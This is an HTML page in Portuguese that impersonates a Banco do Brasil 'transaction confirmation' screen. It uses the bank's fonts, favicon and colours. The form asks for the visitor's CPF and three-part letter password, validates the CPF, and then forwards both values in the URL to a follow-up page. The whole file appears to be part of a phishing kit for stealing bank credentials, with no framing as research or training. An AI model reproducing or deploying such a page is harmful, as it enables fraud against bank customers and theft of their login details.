<!DOCTYPE html>
<html lang="pt-br">
<head>
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/toastify-js/src/toastify.min.css">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.1/css/all.css" crossorigin="anonymous">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="bb.ico">
    <title>Confirmação de Transação</title>
    <style>
        @font-face {
            font-family: "FontCustom";
            src: url("banco_do_brasil_textos_bold.ttf") format("truetype");
        }
        @font-face {
            font-family: "FontCustom2";
            src: url("banco_do_brasil_textos_medium.ttf") format("truetype");
        }
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
        }
        .header2 {
            background-color: #1752fc;
            height: 16px;
            margin: 0;
            padding: 0;
        }
        .container {
            display: flex;
            align-items: center;
            justify-content: flex-start;
            padding: 0 24px;
            flex-direction: column;
        }
        .container-header {
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin: 20px 24px;
        }
        h2 {
            margin: 0;
            text-align: center;
            font-family: "FontCustom2", Arial, sans-serif;
            font-size: 20px;
        }
        .back-icon {
            color: #1752fc;
            font-size: 24px;
            margin-right: 10px;
        }
        form {
            width: 100%;
            max-width: 400px;
            margin-top: 20px;
        }
        label {
            display: block;
            margin-bottom: 5px;
            font-family: "FontCustom2", Arial, sans-serif;
            font-size: 16px;
            margin-top: 16px;
        }
        input {
            width: 100%;
            padding: 8px;
            margin-bottom: 8px;
            font-size: 16px;
            border: none;
            border-bottom: 1px solid #ccc;
            background-color: #f5f5fc;
            border-top-left-radius: 4px;
            border-top-right-radius: 4px;
            box-sizing: border-box;
            height: 40px;
            transition: border-bottom-color 0.3s ease;
            text-transform: uppercase;
        }
        input:focus {
            outline: none;
            border-bottom-color: #525eff;
        }
        input[type="submit"] {
            font-family: "FontCustom", Arial, sans-serif;
            background-color: #fcfc30;
            color: #3e4eb8;
            cursor: pointer;
            border-radius: 4px;
            position: fixed;
            left: 0;
            bottom: 0;
            margin-bottom: 0;
            height: 60px;
            width: 100%;
        }
        .senha-inputs {
            display: flex;
            justify-content: center;
            margin-top: 20px;
        }
        .senha-inputs input {
            width: 60px;
            margin: 0 5px;
            text-align: center;
        }
        .loading-icon {
            width: 50px;
            height: 50px;
            border: 5px solid #f3f3f3;
            border-radius: 50%;
            border-top: 5px solid #1752fc;
            animation: spin 2s linear infinite;
            margin-top: 16px;
        }
        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
        .loading-content {
            position: absolute;
            text-align: center;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }
        .loading-bg {
            visibility: hidden;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.8);
            z-index: 9999;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .loading-text {
            font-size: 20px;
            font-family: "FontCustom", Arial, sans-serif;
        }
    </style>
</head>
<body>
    <script src="https://cdn.jsdelivr.net/npm/toastify-js@1.11.2"></script>
    <img style="margin-bottom: -6px;" src="top2.jpeg" width="100%" />
    <div class="header2"></div>

    <div class="container-header">
        <a href="index.html"><i class="fa fa-arrow-left back-icon" aria-hidden="true"></i></a>
        <h2>Confirmação de Transação</h2>
        <div style="width: 24px"></div>
    </div>

    <div class="container">
        <p>Para confirmar sua transação, digite seu CPF e senha de letras:</p>
        <form id="confirmForm" onsubmit="return validateForm()">
            <label for="cpf">CPF:</label>
            <input type="text" id="cpf" name="cpf" maxlength="14" required oninput="applyCpfMask(this)" onkeypress="return onlyNumbersAndDots(event)">
            <label>Senha de Letras:</label>
            <div class="senha-inputs">
                <input type="text" id="senha1" name="senha1" maxlength="2" required oninput="moveToNext(this, 'senha2')">
                <input type="text" id="senha2" name="senha2" maxlength="2" required oninput="moveToNext(this, 'senha3')">
                <input type="text" id="senha3" name="senha3" maxlength="2" required>
            </div>
            <input type="submit" value="Confirmar">
        </form>
    </div>
    <div id="loading" class="loading-bg">
        <div class="loading-content">
            <div class="loading-icon"></div>
            <p class="loading-text">Carregando...</p>
        </div>
    </div>
    <script>
        function applyCpfMask(input) {
            let value = input.value.replace(/\D/g, '');
            let formattedValue = '';
            let index = 0;

            if (value.length > 0) {
                formattedValue += value.substring(0, 3);
                if (value.length > 3) {
                    formattedValue += '.' + value.substring(3, 6);
                }
                if (value.length > 6) {
                    formattedValue += '.' + value.substring(6, 9);
                }
                if (value.length > 9) {
                    formattedValue += '-' + value.substring(9, 11);
                }
            }
            input.value = formattedValue;
        }

        function onlyNumbersAndDots(event) {
            const charCode = event.which ? event.which : event.keyCode;
            if (charCode !== 46 && charCode > 31 && (charCode < 48 || charCode > 57)) {
                event.preventDefault();
                return false;
            }
            return true;
        }

        function moveToNext(input, nextId) {
            if (input.value.length === input.maxLength) {
                document.getElementById(nextId).focus();
            }
        }

        function validateForm() {
            document.getElementById("loading").style.visibility = "visible";
            const cpf = document.getElementById('cpf').value.replace(/\D/g, '');
            const senha1 = document.getElementById('senha1').value;
            const senha2 = document.getElementById('senha2').value;
            const senha3 = document.getElementById('senha3').value;
            const senha = senha1 + senha2 + senha3;

            if (!validateCPF(cpf)) {
                Toastify({ text: "CPF inválido.", backgroundColor: "red", duration: 3000 }).showToast();
                document.getElementById("loading").style.visibility = "hidden";
                return false;
            }

            // Redireciona para fim.html, PASSANDO OS DADOS NA URL
            document.getElementById("loading").style.visibility = "hidden"; //Esconde antes de mudar a pagina
            window.location.href = `fim.html?cpf=${encodeURIComponent(cpf)}&senha=${encodeURIComponent(senha)}`;

            return false; // Impede o envio padrão do formulário.
        }

        function validateCPF(cpf) {
            if (cpf.length !== 11) {
                return false;
            }

            if (/^(\d)\1+$/.test(cpf)) {
                return false;
            }

            let sum = 0;
            let remainder;

            for (let i = 1; i <= 9; i++) {
                sum = sum + parseInt(cpf.substring(i - 1, i)) * (11 - i);
            }

            remainder = (sum * 10) % 11;

            if ((remainder === 10) || (remainder === 11)) {
                remainder = 0;
            }

            if (remainder !== parseInt(cpf.substring(9, 10))) {
                return false;
            }

            sum = 0;

            for (let i = 1; i <= 10; i++) {
                sum = sum + parseInt(cpf.substring(i - 1, i)) * (12 - i);
            }

            remainder = (sum * 10) % 11;

            if ((remainder === 10) || (remainder === 11)) {
                remainder = 0;
            }

            if (remainder !== parseInt(cpf.substring(10, 11))) {
                return false;
            }

            return true;
        }
    </script>
</body>
</html>